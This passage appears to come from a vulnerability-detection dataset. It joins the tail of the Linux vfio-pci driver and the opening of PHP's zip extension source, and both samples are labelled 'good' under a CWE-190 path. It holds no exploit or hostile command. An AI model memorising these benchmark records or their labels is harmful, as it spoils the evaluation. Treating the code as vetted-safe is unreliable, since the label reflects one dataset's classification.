devices = kcalloc(fill.max, sizeof(*devices), GFP_KERNEL);
if (!devices)
return -ENOMEM;
fill.devices = devices;
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_fill_devs,
&fill, slot);
/*
* If a device was removed between counting and filling,
* we may come up short of fill.max. If a device was
* added, we'll have a return of -EAGAIN above.
*/
if (!ret)
hdr.count = fill.cur;
reset_info_exit:
if (copy_to_user((void __user *)arg, &hdr, minsz))
ret = -EFAULT;
if (!ret) {
if (copy_to_user((void __user *)(arg + minsz), devices,
hdr.count * sizeof(*devices)))
ret = -EFAULT;
}
kfree(devices);
return ret;
} else if (cmd == VFIO_DEVICE_PCI_HOT_RESET) {
struct vfio_pci_hot_reset hdr;
int32_t *group_fds;
struct vfio_pci_group_entry *groups;
struct vfio_pci_group_info info;
bool slot = false;
int i, count = 0, ret = 0;
minsz = offsetofend(struct vfio_pci_hot_reset, count);
if (copy_from_user(&hdr, (void __user *)arg, minsz))
return -EFAULT;
if (hdr.argsz < minsz || hdr.flags)
return -EINVAL;
/* Can we do a slot or bus reset or neither? */
if (!pci_probe_reset_slot(vdev->pdev->slot))
slot = true;
else if (pci_probe_reset_bus(vdev->pdev->bus))
return -ENODEV;
/*
* We can't let userspace give us an arbitrarily large
* buffer to copy, so verify how many we think there
* could be. Note groups can have multiple devices so
* one group per device is the max.
*/
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_count_devs,
&count, slot);
if (ret)
return ret;
/* Somewhere between 1 and count is OK */
if (!hdr.count || hdr.count > count)
return -EINVAL;
group_fds = kcalloc(hdr.count, sizeof(*group_fds), GFP_KERNEL);
groups = kcalloc(hdr.count, sizeof(*groups), GFP_KERNEL);
if (!group_fds || !groups) {
kfree(group_fds);
kfree(groups);
return -ENOMEM;
}
if (copy_from_user(group_fds, (void __user *)(arg + minsz),
hdr.count * sizeof(*group_fds))) {
kfree(group_fds);
kfree(groups);
return -EFAULT;
}
/*
* For each group_fd, get the group through the vfio external
* user interface and store the group and iommu ID. This
* ensures the group is held across the reset.
*/
for (i = 0; i < hdr.count; i++) {
struct vfio_group *group;
struct fd f = fdget(group_fds[i]);
if (!f.file) {
ret = -EBADF;
break;
}
group = vfio_group_get_external_user(f.file);
fdput(f);
if (IS_ERR(group)) {
ret = PTR_ERR(group);
break;
}
groups[i].group = group;
groups[i].id = vfio_external_user_iommu_id(group);
}
kfree(group_fds);
/* release reference to groups on error */
if (ret)
goto hot_reset_release;
info.count = hdr.count;
info.groups = groups;
/*
* Test whether all the affected devices are contained
* by the set of groups provided by the user.
*/
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_validate_devs,
&info, slot);
if (!ret)
/* User has access, do the reset */
ret = slot ? pci_try_reset_slot(vdev->pdev->slot) :
pci_try_reset_bus(vdev->pdev->bus);
hot_reset_release:
for (i--; i >= 0; i--)
vfio_group_put_external_user(groups[i].group);
kfree(groups);
return ret;
}
return -ENOTTY;
}
static ssize_t vfio_pci_rw(void *device_data, char __user *buf,
size_t count, loff_t *ppos, bool iswrite)
{
unsigned int index = VFIO_PCI_OFFSET_TO_INDEX(*ppos);
struct vfio_pci_device *vdev = device_data;
if (index >= VFIO_PCI_NUM_REGIONS + vdev->num_regions)
return -EINVAL;
switch (index) {
case VFIO_PCI_CONFIG_REGION_INDEX:
return vfio_pci_config_rw(vdev, buf, count, ppos, iswrite);
case VFIO_PCI_ROM_REGION_INDEX:
if (iswrite)
return -EINVAL;
return vfio_pci_bar_rw(vdev, buf, count, ppos, false);
case VFIO_PCI_BAR0_REGION_INDEX ... VFIO_PCI_BAR5_REGION_INDEX:
return vfio_pci_bar_rw(vdev, buf, count, ppos, iswrite);
case VFIO_PCI_VGA_REGION_INDEX:
return vfio_pci_vga_rw(vdev, buf, count, ppos, iswrite);
default:
index -= VFIO_PCI_NUM_REGIONS;
return vdev->region[index].ops->rw(vdev, buf,
count, ppos, iswrite);
}
return -EINVAL;
}
static ssize_t vfio_pci_read(void *device_data, char __user *buf,
size_t count, loff_t *ppos)
{
if (!count)
return 0;
return vfio_pci_rw(device_data, buf, count, ppos, false);
}
static ssize_t vfio_pci_write(void *device_data, const char __user *buf,
size_t count, loff_t *ppos)
{
if (!count)
return 0;
return vfio_pci_rw(device_data, (char __user *)buf, count, ppos, true);
}
static int vfio_pci_mmap(void *device_data, struct vm_area_struct *vma)
{
struct vfio_pci_device *vdev = device_data;
struct pci_dev *pdev = vdev->pdev;
unsigned int index;
u64 phys_len, req_len, pgoff, req_start;
int ret;
index = vma->vm_pgoff >> (VFIO_PCI_OFFSET_SHIFT - PAGE_SHIFT);
if (vma->vm_end < vma->vm_start)
return -EINVAL;
if ((vma->vm_flags & VM_SHARED) == 0)
return -EINVAL;
if (index >= VFIO_PCI_ROM_REGION_INDEX)
return -EINVAL;
if (!vdev->bar_mmap_supported[index])
return -EINVAL;
phys_len = PAGE_ALIGN(pci_resource_len(pdev, index));
req_len = vma->vm_end - vma->vm_start;
pgoff = vma->vm_pgoff &
((1U << (VFIO_PCI_OFFSET_SHIFT - PAGE_SHIFT)) - 1);
req_start = pgoff << PAGE_SHIFT;
if (req_start + req_len > phys_len)
return -EINVAL;
if (index == vdev->msix_bar) {
/*
* Disallow mmaps overlapping the MSI-X table; users don't
* get to touch this directly. We could find somewhere
* else to map the overlap, but page granularity is only
* a recommendation, not a requirement, so the user needs
* to know which bits are real. Requiring them to mmap
* around the table makes that clear.
*/
/* If neither entirely above nor below, then it overlaps */
if (!(req_start >= vdev->msix_offset + vdev->msix_size ||
req_start + req_len <= vdev->msix_offset))
return -EINVAL;
}
/*
* Even though we don't make use of the barmap for the mmap,
* we need to request the region and the barmap tracks that.
*/
if (!vdev->barmap[index]) {
ret = pci_request_selected_regions(pdev,
1 << index, "vfio-pci");
if (ret)
return ret;
vdev->barmap[index] = pci_iomap(pdev, index, 0);
}
vma->vm_private_data = vdev;
vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot);
vma->vm_pgoff = (pci_resource_start(pdev, index) >> PAGE_SHIFT) + pgoff;
return remap_pfn_range(vma, vma->vm_start, vma->vm_pgoff,
req_len, vma->vm_page_prot);
}
static void vfio_pci_request(void *device_data, unsigned int count)
{
struct vfio_pci_device *vdev = device_data;
mutex_lock(&vdev->igate);
if (vdev->req_trigger) {
if (!(count % 10))
dev_notice_ratelimited(&vdev->pdev->dev,
"Relaying device request to user (#%u)\n",
count);
eventfd_signal(vdev->req_trigger, 1);
} else if (count == 0) {
dev_warn(&vdev->pdev->dev,
"No device request channel registered, blocked until released by user\n");
}
mutex_unlock(&vdev->igate);
}
static const struct vfio_device_ops vfio_pci_ops = {
.name = "vfio-pci",
.open = vfio_pci_open,
.release = vfio_pci_release,
.ioctl = vfio_pci_ioctl,
.read = vfio_pci_read,
.write = vfio_pci_write,
.mmap = vfio_pci_mmap,
.request = vfio_pci_request,
};
static int vfio_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
{
struct vfio_pci_device *vdev;
struct iommu_group *group;
int ret;
if (pdev->hdr_type != PCI_HEADER_TYPE_NORMAL)
return -EINVAL;
group = vfio_iommu_group_get(&pdev->dev);
if (!group)
return -EINVAL;
vdev = kzalloc(sizeof(*vdev), GFP_KERNEL);
if (!vdev) {
vfio_iommu_group_put(group, &pdev->dev);
return -ENOMEM;
}
vdev->pdev = pdev;
vdev->irq_type = VFIO_PCI_NUM_IRQS;
mutex_init(&vdev->igate);
spin_lock_init(&vdev->irqlock);
ret = vfio_add_group_dev(&pdev->dev, &vfio_pci_ops, vdev);
if (ret) {
vfio_iommu_group_put(group, &pdev->dev);
kfree(vdev);
return ret;
}
if (vfio_pci_is_vga(pdev)) {
vga_client_register(pdev, vdev, NULL, vfio_pci_set_vga_decode);
vga_set_legacy_decoding(pdev,
vfio_pci_set_vga_decode(vdev, false));
}
if (!disable_idle_d3) {
/*
* pci-core sets the device power state to an unknown value at
* bootup and after being removed from a driver. The only
* transition it allows from this unknown state is to D0, which
* typically happens when a driver calls pci_enable_device().
* We're not ready to enable the device yet, but we do want to
* be able to get to D3. Therefore first do a D0 transition
* before going to D3.
*/
pci_set_power_state(pdev, PCI_D0);
pci_set_power_state(pdev, PCI_D3hot);
}
return ret;
}
static void vfio_pci_remove(struct pci_dev *pdev)
{
struct vfio_pci_device *vdev;
vdev = vfio_del_group_dev(&pdev->dev);
if (!vdev)
return;
vfio_iommu_group_put(pdev->dev.iommu_group, &pdev->dev);
kfree(vdev->region);
kfree(vdev);
if (vfio_pci_is_vga(pdev)) {
vga_client_register(pdev, NULL, NULL, NULL);
vga_set_legacy_decoding(pdev,
VGA_RSRC_NORMAL_IO | VGA_RSRC_NORMAL_MEM |
VGA_RSRC_LEGACY_IO | VGA_RSRC_LEGACY_MEM);
}
if (!disable_idle_d3)
pci_set_power_state(pdev, PCI_D0);
}
static pci_ers_result_t vfio_pci_aer_err_detected(struct pci_dev *pdev,
pci_channel_state_t state)
{
struct vfio_pci_device *vdev;
struct vfio_device *device;
device = vfio_device_get_from_dev(&pdev->dev);
if (device == NULL)
return PCI_ERS_RESULT_DISCONNECT;
vdev = vfio_device_data(device);
if (vdev == NULL) {
vfio_device_put(device);
return PCI_ERS_RESULT_DISCONNECT;
}
mutex_lock(&vdev->igate);
if (vdev->err_trigger)
eventfd_signal(vdev->err_trigger, 1);
mutex_unlock(&vdev->igate);
vfio_device_put(device);
return PCI_ERS_RESULT_CAN_RECOVER;
}
static const struct pci_error_handlers vfio_err_handlers = {
.error_detected = vfio_pci_aer_err_detected,
};
static struct pci_driver vfio_pci_driver = {
.name = "vfio-pci",
.id_table = NULL, /* only dynamic ids */
.probe = vfio_pci_probe,
.remove = vfio_pci_remove,
.err_handler = &vfio_err_handlers,
};
struct vfio_devices {
struct vfio_device **devices;
int cur_index;
int max_index;
};
static int vfio_pci_get_devs(struct pci_dev *pdev, void *data)
{
struct vfio_devices *devs = data;
struct vfio_device *device;
if (devs->cur_index == devs->max_index)
return -ENOSPC;
device = vfio_device_get_from_dev(&pdev->dev);
if (!device)
return -EINVAL;
if (pci_dev_driver(pdev) != &vfio_pci_driver) {
vfio_device_put(device);
return -EBUSY;
}
devs->devices[devs->cur_index++] = device;
return 0;
}
/*
* Attempt to do a bus/slot reset if there are devices affected by a reset for
* this device that are needs_reset and all of the affected devices are unused
* (!refcnt). Callers are required to hold driver_lock when calling this to
* prevent device opens and concurrent bus reset attempts. We prevent device
* unbinds by acquiring and holding a reference to the vfio_device.
*
* NB: vfio-core considers a group to be viable even if some devices are
* bound to drivers like pci-stub or pcieport. Here we require all devices
* to be bound to vfio_pci since that's the only way we can be sure they
* stay put.
*/
static void vfio_pci_try_bus_reset(struct vfio_pci_device *vdev)
{
struct vfio_devices devs = { .cur_index = 0 };
int i = 0, ret = -EINVAL;
bool needs_reset = false, slot = false;
struct vfio_pci_device *tmp;
if (!pci_probe_reset_slot(vdev->pdev->slot))
slot = true;
else if (pci_probe_reset_bus(vdev->pdev->bus))
return;
if (vfio_pci_for_each_slot_or_bus(vdev->pdev, vfio_pci_count_devs,
&i, slot) || !i)
return;
devs.max_index = i;
devs.devices = kcalloc(i, sizeof(struct vfio_device *), GFP_KERNEL);
if (!devs.devices)
return;
if (vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_get_devs, &devs, slot))
goto put_devs;
for (i = 0; i < devs.cur_index; i++) {
tmp = vfio_device_data(devs.devices[i]);
if (tmp->needs_reset)
needs_reset = true;
if (tmp->refcnt)
goto put_devs;
}
if (needs_reset)
ret = slot ? pci_try_reset_slot(vdev->pdev->slot) :
pci_try_reset_bus(vdev->pdev->bus);
put_devs:
for (i = 0; i < devs.cur_index; i++) {
tmp = vfio_device_data(devs.devices[i]);
if (!ret)
tmp->needs_reset = false;
if (!tmp->refcnt && !disable_idle_d3)
pci_set_power_state(tmp->pdev, PCI_D3hot);
vfio_device_put(devs.devices[i]);
}
kfree(devs.devices);
}
static void __exit vfio_pci_cleanup(void)
{
pci_unregister_driver(&vfio_pci_driver);
vfio_pci_uninit_perm_bits();
}
static void __init vfio_pci_fill_ids(void)
{
char *p, *id;
int rc;
/* no ids passed actually */
if (ids[0] == '\0')
return;
/* add ids specified in the module parameter */
p = ids;
while ((id = strsep(&p, ","))) {
unsigned int vendor, device, subvendor = PCI_ANY_ID,
subdevice = PCI_ANY_ID, class = 0, class_mask = 0;
int fields;
if (!strlen(id))
continue;
fields = sscanf(id, "%x:%x:%x:%x:%x:%x",
&vendor, &device, &subvendor, &subdevice,
&class, &class_mask);
if (fields < 2) {
pr_warn("invalid id string \"%s\"\n", id);
continue;
}
rc = pci_add_dynid(&vfio_pci_driver, vendor, device,
subvendor, subdevice, class, class_mask, 0);
if (rc)
pr_warn("failed to add dynamic id [%04hx:%04hx[%04hx:%04hx]] class %#08x/%08x (%d)\n",
vendor, device, subvendor, subdevice,
class, class_mask, rc);
else
pr_info("add [%04hx:%04hx[%04hx:%04hx]] class %#08x/%08x\n",
vendor, device, subvendor, subdevice,
class, class_mask);
}
}
static int __init vfio_pci_init(void)
{
int ret;
/* Allocate shared config space permision data used by all devices */
ret = vfio_pci_init_perm_bits();
if (ret)
return ret;
/* Register and scan for devices */
ret = pci_register_driver(&vfio_pci_driver);
if (ret)
goto out_driver;
vfio_pci_fill_ids();
return 0;
out_driver:
vfio_pci_uninit_perm_bits();
return ret;
}
module_init(vfio_pci_init);
module_exit(vfio_pci_cleanup);
MODULE_VERSION(DRIVER_VERSION);
MODULE_LICENSE("GPL v2");
MODULE_AUTHOR(DRIVER_AUTHOR);
MODULE_DESCRIPTION(DRIVER_DESC);
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_5375_0 |
crossvul-cpp_data_good_4988_0 | /*
+----------------------------------------------------------------------+
| PHP Version 7 |
+----------------------------------------------------------------------+
| Copyright (c) 1997-2016 The PHP Group |
+----------------------------------------------------------------------+
| This source file is subject to version 3.01 of the PHP license, |
| that is bundled with this package in the file LICENSE, and is |
| available through the world-wide-web at the following url: |
| http://www.php.net/license/3_01.txt. |
| If you did not receive a copy of the PHP license and are unable to |
| obtain it through the world-wide-web, please send a note to |
| license@php.net so we can mail you a copy immediately. |
+----------------------------------------------------------------------+
| Author: Piere-Alain Joye <pierre@php.net> |
+----------------------------------------------------------------------+
*/
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include "php.h"
#include "php_ini.h"
#include "ext/standard/info.h"
#include "ext/standard/file.h"
#include "ext/standard/php_string.h"
#include "ext/pcre/php_pcre.h"
#include "ext/standard/php_filestat.h"
#include "php_zip.h"
/* zip_open is a macro for renaming libzip zipopen, so we need to use PHP_NAMED_FUNCTION */
static PHP_NAMED_FUNCTION(zif_zip_open);
static PHP_NAMED_FUNCTION(zif_zip_read);
static PHP_NAMED_FUNCTION(zif_zip_close);
static PHP_NAMED_FUNCTION(zif_zip_entry_read);
static PHP_NAMED_FUNCTION(zif_zip_entry_filesize);
static PHP_NAMED_FUNCTION(zif_zip_entry_name);
static PHP_NAMED_FUNCTION(zif_zip_entry_compressedsize);
static PHP_NAMED_FUNCTION(zif_zip_entry_compressionmethod);
static PHP_NAMED_FUNCTION(zif_zip_entry_open);
static PHP_NAMED_FUNCTION(zif_zip_entry_close);
#ifdef HAVE_GLOB
#ifndef PHP_WIN32
#include <glob.h>
#else
#include "win32/glob.h"
#endif
#endif
/* {{{ Resource le */
static int le_zip_dir;
#define le_zip_dir_name "Zip Directory"
static int le_zip_entry;
#define le_zip_entry_name "Zip Entry"
/* }}} */
/* {{{ PHP_ZIP_STAT_INDEX(za, index, flags, sb) */
#define PHP_ZIP_STAT_INDEX(za, index, flags, sb) \
if (zip_stat_index(za, index, flags, &sb) != 0) { \
RETURN_FALSE; \
}
/* }}} */
/* {{{ PHP_ZIP_STAT_PATH(za, path, path_len, flags, sb) */
#define PHP_ZIP_STAT_PATH(za, path, path_len, flags, sb) \
if (path_len < 1) { \
php_error_docref(NULL, E_NOTICE, "Empty string as entry name"); \
RETURN_FALSE; \
} \
if (zip_stat(za, path, flags, &sb) != 0) { \
RETURN_FALSE; \
}
/* }}} */
/* {{{ PHP_ZIP_SET_FILE_COMMENT(za, index, comment, comment_len) */
#define PHP_ZIP_SET_FILE_COMMENT(za, index, comment, comment_len) \
if (comment_len == 0) { \
/* Passing NULL remove the existing comment */ \
if (zip_set_file_comment(za, index, NULL, 0) < 0) { \
RETURN_FALSE; \
} \
} else if (zip_set_file_comment(za, index, comment, comment_len) < 0) { \
RETURN_FALSE; \
} \
RETURN_TRUE;
/* }}} */
# define add_ascii_assoc_string add_assoc_string
# define add_ascii_assoc_long add_assoc_long
/* Flatten a path by making a relative path (to .)*/
static char * php_zip_make_relative_path(char *path, size_t path_len) /* {{{ */
{
char *path_begin = path;
size_t i;
if (path_len < 1 || path == NULL) {
return NULL;
}
if (IS_SLASH(path[0])) {
return path + 1;
}
i = path_len;
while (1) {
while (i > 0 && !IS_SLASH(path[i])) {
i--;
}
if (!i) {
return path;
}
if (i >= 2 && (path[i -1] == '.' || path[i -1] == ':')) {
/* i is the position of . or :, add 1 for / */
path_begin = path + i + 1;
break;
}
i--;
}
return path_begin;
}
/* }}} */
# define CWD_STATE_ALLOC(l) emalloc(l)
# define CWD_STATE_FREE(s) efree(s)
/* {{{ php_zip_extract_file */
static int php_zip_extract_file(struct zip * za, char *dest, char *file, int file_len)
{
php_stream_statbuf ssb;
struct zip_file *zf;
struct zip_stat sb;
char b[8192];
int n, len, ret;
php_stream *stream;
char *fullpath;
char *file_dirname_fullpath;
char file_dirname[MAXPATHLEN];
size_t dir_len;
int is_dir_only = 0;
char *path_cleaned;
size_t path_cleaned_len;
cwd_state new_state;
zend_string *file_basename;
new_state.cwd = CWD_STATE_ALLOC(1);
new_state.cwd[0] = '\0';
new_state.cwd_length = 0;
/* Clean/normlize the path and then transform any path (absolute or relative)
to a path relative to cwd (../../mydir/foo.txt > mydir/foo.txt)
*/
virtual_file_ex(&new_state, file, NULL, CWD_EXPAND);
path_cleaned = php_zip_make_relative_path(new_state.cwd, new_state.cwd_length);
if(!path_cleaned) {
return 0;
}
path_cleaned_len = strlen(path_cleaned);
if (path_cleaned_len >= MAXPATHLEN || zip_stat(za, file, 0, &sb) != 0) {
return 0;
}
/* it is a directory only, see #40228 */
if (path_cleaned_len > 1 && IS_SLASH(path_cleaned[path_cleaned_len - 1])) {
len = spprintf(&file_dirname_fullpath, 0, "%s/%s", dest, path_cleaned);
is_dir_only = 1;
} else {
memcpy(file_dirname, path_cleaned, path_cleaned_len);
dir_len = php_dirname(file_dirname, path_cleaned_len);
if (dir_len <= 0 || (dir_len == 1 && file_dirname[0] == '.')) {
len = spprintf(&file_dirname_fullpath, 0, "%s", dest);
} else {
len = spprintf(&file_dirname_fullpath, 0, "%s/%s", dest, file_dirname);
}
file_basename = php_basename(path_cleaned, path_cleaned_len, NULL, 0);
if (ZIP_OPENBASEDIR_CHECKPATH(file_dirname_fullpath)) {
efree(file_dirname_fullpath);
zend_string_release(file_basename);
CWD_STATE_FREE(new_state.cwd);
return 0;
}
}
/* let see if the path already exists */
if (php_stream_stat_path_ex(file_dirname_fullpath, PHP_STREAM_URL_STAT_QUIET, &ssb, NULL) < 0) {
ret = php_stream_mkdir(file_dirname_fullpath, 0777, PHP_STREAM_MKDIR_RECURSIVE|REPORT_ERRORS, NULL);
if (!ret) {
efree(file_dirname_fullpath);
if (!is_dir_only) {
zend_string_release(file_basename);
CWD_STATE_FREE(new_state.cwd);
}
return 0;
}
}
/* it is a standalone directory, job done */
if (is_dir_only) {
efree(file_dirname_fullpath);
CWD_STATE_FREE(new_state.cwd);
return 1;
}
len = spprintf(&fullpath, 0, "%s/%s", file_dirname_fullpath, ZSTR_VAL(file_basename));
if (!len) {
efree(file_dirname_fullpath);
zend_string_release(file_basename);
CWD_STATE_FREE(new_state.cwd);
return 0;
} else if (len > MAXPATHLEN) {
php_error_docref(NULL, E_WARNING, "Full extraction path exceed MAXPATHLEN (%i)", MAXPATHLEN);
efree(file_dirname_fullpath);
zend_string_release(file_basename);
CWD_STATE_FREE(new_state.cwd);
return 0;
}
/* check again the full path, not sure if it
* is required, does a file can have a different
* safemode status as its parent folder?
*/
if (ZIP_OPENBASEDIR_CHECKPATH(fullpath)) {
efree(fullpath);
efree(file_dirname_fullpath);
zend_string_release(file_basename);
CWD_STATE_FREE(new_state.cwd);
return 0;
}
stream = php_stream_open_wrapper(fullpath, "w+b", REPORT_ERRORS, NULL);
if (stream == NULL) {
n = -1;
goto done;
}
zf = zip_fopen(za, file, 0);
if (zf == NULL) {
n = -1;
php_stream_close(stream);
goto done;
}
n = 0;
while ((n=zip_fread(zf, b, sizeof(b))) > 0) {
php_stream_write(stream, b, n);
}
php_stream_close(stream);
n = zip_fclose(zf);
done:
efree(fullpath);
zend_string_release(file_basename);
efree(file_dirname_fullpath);
CWD_STATE_FREE(new_state.cwd);
if (n<0) {
return 0;
} else {
return 1;
}
}
/* }}} */
static int php_zip_add_file(struct zip *za, const char *filename, size_t filename_len,
char *entry_name, size_t entry_name_len, long offset_start, long offset_len) /* {{{ */
{
struct zip_source *zs;
char resolved_path[MAXPATHLEN];
zval exists_flag;
if (ZIP_OPENBASEDIR_CHECKPATH(filename)) {
return -1;
}
if (!expand_filepath(filename, resolved_path)) {
return -1;
}
php_stat(resolved_path, strlen(resolved_path), FS_EXISTS, &exists_flag);
if (Z_TYPE(exists_flag) == IS_FALSE) {
return -1;
}
zs = zip_source_file(za, resolved_path, offset_start, offset_len);
if (!zs) {
return -1;
}
if (zip_file_add(za, entry_name, zs, ZIP_FL_OVERWRITE) < 0) {
zip_source_free(zs);
return -1;
} else {
zip_error_clear(za);
return 1;
}
}
/* }}} */
static int php_zip_parse_options(zval *options, zend_long *remove_all_path, char **remove_path, size_t *remove_path_len, char **add_path, size_t *add_path_len) /* {{{ */
{
zval *option;
if ((option = zend_hash_str_find(Z_ARRVAL_P(options), "remove_all_path", sizeof("remove_all_path") - 1)) != NULL) {
*remove_all_path = zval_get_long(option);
}
/* If I add more options, it would make sense to create a nice static struct and loop over it. */
if ((option = zend_hash_str_find(Z_ARRVAL_P(options), "remove_path", sizeof("remove_path") - 1)) != NULL) {
if (Z_TYPE_P(option) != IS_STRING) {
php_error_docref(NULL, E_WARNING, "remove_path option expected to be a string");
return -1;
}
if (Z_STRLEN_P(option) < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string given as remove_path option");
return -1;
}
if (Z_STRLEN_P(option) >= MAXPATHLEN) {
php_error_docref(NULL, E_WARNING, "remove_path string is too long (max: %d, %zd given)",
MAXPATHLEN - 1, Z_STRLEN_P(option));
return -1;
}
*remove_path_len = Z_STRLEN_P(option);
*remove_path = Z_STRVAL_P(option);
}
if ((option = zend_hash_str_find(Z_ARRVAL_P(options), "add_path", sizeof("add_path") - 1)) != NULL) {
if (Z_TYPE_P(option) != IS_STRING) {
php_error_docref(NULL, E_WARNING, "add_path option expected to be a string");
return -1;
}
if (Z_STRLEN_P(option) < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string given as the add_path option");
return -1;
}
if (Z_STRLEN_P(option) >= MAXPATHLEN) {
php_error_docref(NULL, E_WARNING, "add_path string too long (max: %d, %zd given)",
MAXPATHLEN - 1, Z_STRLEN_P(option));
return -1;
}
*add_path_len = Z_STRLEN_P(option);
*add_path = Z_STRVAL_P(option);
}
return 1;
}
/* }}} */
/* {{{ REGISTER_ZIP_CLASS_CONST_LONG */
#define REGISTER_ZIP_CLASS_CONST_LONG(const_name, value) \
zend_declare_class_constant_long(zip_class_entry, const_name, sizeof(const_name)-1, (zend_long)value);
/* }}} */
/* {{{ ZIP_FROM_OBJECT */
#define ZIP_FROM_OBJECT(intern, object) \
{ \
ze_zip_object *obj = Z_ZIP_P(object); \
intern = obj->za; \
if (!intern) { \
php_error_docref(NULL, E_WARNING, "Invalid or uninitialized Zip object"); \
RETURN_FALSE; \
} \
}
/* }}} */
/* {{{ RETURN_SB(sb) */
#define RETURN_SB(sb) \
{ \
array_init(return_value); \
add_ascii_assoc_string(return_value, "name", (char *)(sb)->name); \
add_ascii_assoc_long(return_value, "index", (zend_long) (sb)->index); \
add_ascii_assoc_long(return_value, "crc", (zend_long) (sb)->crc); \
add_ascii_assoc_long(return_value, "size", (zend_long) (sb)->size); \
add_ascii_assoc_long(return_value, "mtime", (zend_long) (sb)->mtime); \
add_ascii_assoc_long(return_value, "comp_size", (zend_long) (sb)->comp_size); \
add_ascii_assoc_long(return_value, "comp_method", (zend_long) (sb)->comp_method); \
}
/* }}} */
static int php_zip_status(struct zip *za) /* {{{ */
{
#if LIBZIP_VERSION_MAJOR < 1
int zep, syp;
zip_error_get(za, &zep, &syp);
#else
int zep;
zip_error_t *err;
err = zip_get_error(za);
zep = zip_error_code_zip(err);
zip_error_fini(err);
#endif
return zep;
}
/* }}} */
static int php_zip_status_sys(struct zip *za) /* {{{ */
{
#if LIBZIP_VERSION_MAJOR < 1
int zep, syp;
zip_error_get(za, &zep, &syp);
#else
int syp;
zip_error_t *err;
err = zip_get_error(za);
syp = zip_error_code_system(err);
zip_error_fini(err);
#endif
return syp;
}
/* }}} */
static int php_zip_get_num_files(struct zip *za) /* {{{ */
{
return zip_get_num_files(za);
}
/* }}} */
static char * php_zipobj_get_filename(ze_zip_object *obj) /* {{{ */
{
if (!obj) {
return NULL;
}
if (obj->filename) {
return obj->filename;
}
return NULL;
}
/* }}} */
static char * php_zipobj_get_zip_comment(struct zip *za, int *len) /* {{{ */
{
if (za) {
return (char *)zip_get_archive_comment(za, len, 0);
}
return NULL;
}
/* }}} */
#ifdef HAVE_GLOB /* {{{ */
#ifndef GLOB_ONLYDIR
#define GLOB_ONLYDIR (1<<30)
#define GLOB_EMULATE_ONLYDIR
#define GLOB_FLAGMASK (~GLOB_ONLYDIR)
#else
#define GLOB_FLAGMASK (~0)
#endif
#ifndef GLOB_BRACE
# define GLOB_BRACE 0
#endif
#ifndef GLOB_MARK
# define GLOB_MARK 0
#endif
#ifndef GLOB_NOSORT
# define GLOB_NOSORT 0
#endif
#ifndef GLOB_NOCHECK
# define GLOB_NOCHECK 0
#endif
#ifndef GLOB_NOESCAPE
# define GLOB_NOESCAPE 0
#endif
#ifndef GLOB_ERR
# define GLOB_ERR 0
#endif
/* This is used for checking validity of passed flags (passing invalid flags causes segfault in glob()!! */
#define GLOB_AVAILABLE_FLAGS (0 | GLOB_BRACE | GLOB_MARK | GLOB_NOSORT | GLOB_NOCHECK | GLOB_NOESCAPE | GLOB_ERR | GLOB_ONLYDIR)
#endif /* }}} */
int php_zip_glob(char *pattern, int pattern_len, zend_long flags, zval *return_value) /* {{{ */
{
#ifdef HAVE_GLOB
char cwd[MAXPATHLEN];
int cwd_skip = 0;
#ifdef ZTS
char work_pattern[MAXPATHLEN];
char *result;
#endif
glob_t globbuf;
int n;
int ret;
if (pattern_len >= MAXPATHLEN) {
php_error_docref(NULL, E_WARNING, "Pattern exceeds the maximum allowed length of %d characters", MAXPATHLEN);
return -1;
}
if ((GLOB_AVAILABLE_FLAGS & flags) != flags) {
php_error_docref(NULL, E_WARNING, "At least one of the passed flags is invalid or not supported on this platform");
return -1;
}
#ifdef ZTS
if (!IS_ABSOLUTE_PATH(pattern, pattern_len)) {
result = VCWD_GETCWD(cwd, MAXPATHLEN);
if (!result) {
cwd[0] = '\0';
}
#ifdef PHP_WIN32
if (IS_SLASH(*pattern)) {
cwd[2] = '\0';
}
#endif
cwd_skip = strlen(cwd)+1;
snprintf(work_pattern, MAXPATHLEN, "%s%c%s", cwd, DEFAULT_SLASH, pattern);
pattern = work_pattern;
}
#endif
globbuf.gl_offs = 0;
if (0 != (ret = glob(pattern, flags & GLOB_FLAGMASK, NULL, &globbuf))) {
#ifdef GLOB_NOMATCH
if (GLOB_NOMATCH == ret) {
/* Some glob implementation simply return no data if no matches
were found, others return the GLOB_NOMATCH error code.
We don't want to treat GLOB_NOMATCH as an error condition
so that PHP glob() behaves the same on both types of
implementations and so that 'foreach (glob() as ...'
can be used for simple glob() calls without further error
checking.
*/
array_init(return_value);
return 0;
}
#endif
return 0;
}
/* now catch the FreeBSD style of "no matches" */
if (!globbuf.gl_pathc || !globbuf.gl_pathv) {
array_init(return_value);
return 0;
}
/* we assume that any glob pattern will match files from one directory only
so checking the dirname of the first match should be sufficient */
strncpy(cwd, globbuf.gl_pathv[0], MAXPATHLEN);
if (ZIP_OPENBASEDIR_CHECKPATH(cwd)) {
return -1;
}
array_init(return_value);
for (n = 0; n < globbuf.gl_pathc; n++) {
/* we need to do this every time since GLOB_ONLYDIR does not guarantee that
* all directories will be filtered. GNU libc documentation states the
* following:
* If the information about the type of the file is easily available
* non-directories will be rejected but no extra work will be done to
* determine the information for each file. I.e., the caller must still be
* able to filter directories out.
*/
if (flags & GLOB_ONLYDIR) {
zend_stat_t s;
if (0 != VCWD_STAT(globbuf.gl_pathv[n], &s)) {
continue;
}
if (S_IFDIR != (s.st_mode & S_IFMT)) {
continue;
}
}
add_next_index_string(return_value, globbuf.gl_pathv[n]+cwd_skip);
}
globfree(&globbuf);
return globbuf.gl_pathc;
#else
php_error_docref(NULL, E_ERROR, "Glob support is not available");
return 0;
#endif /* HAVE_GLOB */
}
/* }}} */
int php_zip_pcre(zend_string *regexp, char *path, int path_len, zval *return_value) /* {{{ */
{
#ifdef ZTS
char cwd[MAXPATHLEN];
int cwd_skip = 0;
char work_path[MAXPATHLEN];
char *result;
#endif
int files_cnt;
zend_string **namelist;
#ifdef ZTS
if (!IS_ABSOLUTE_PATH(path, path_len)) {
result = VCWD_GETCWD(cwd, MAXPATHLEN);
if (!result) {
cwd[0] = '\0';
}
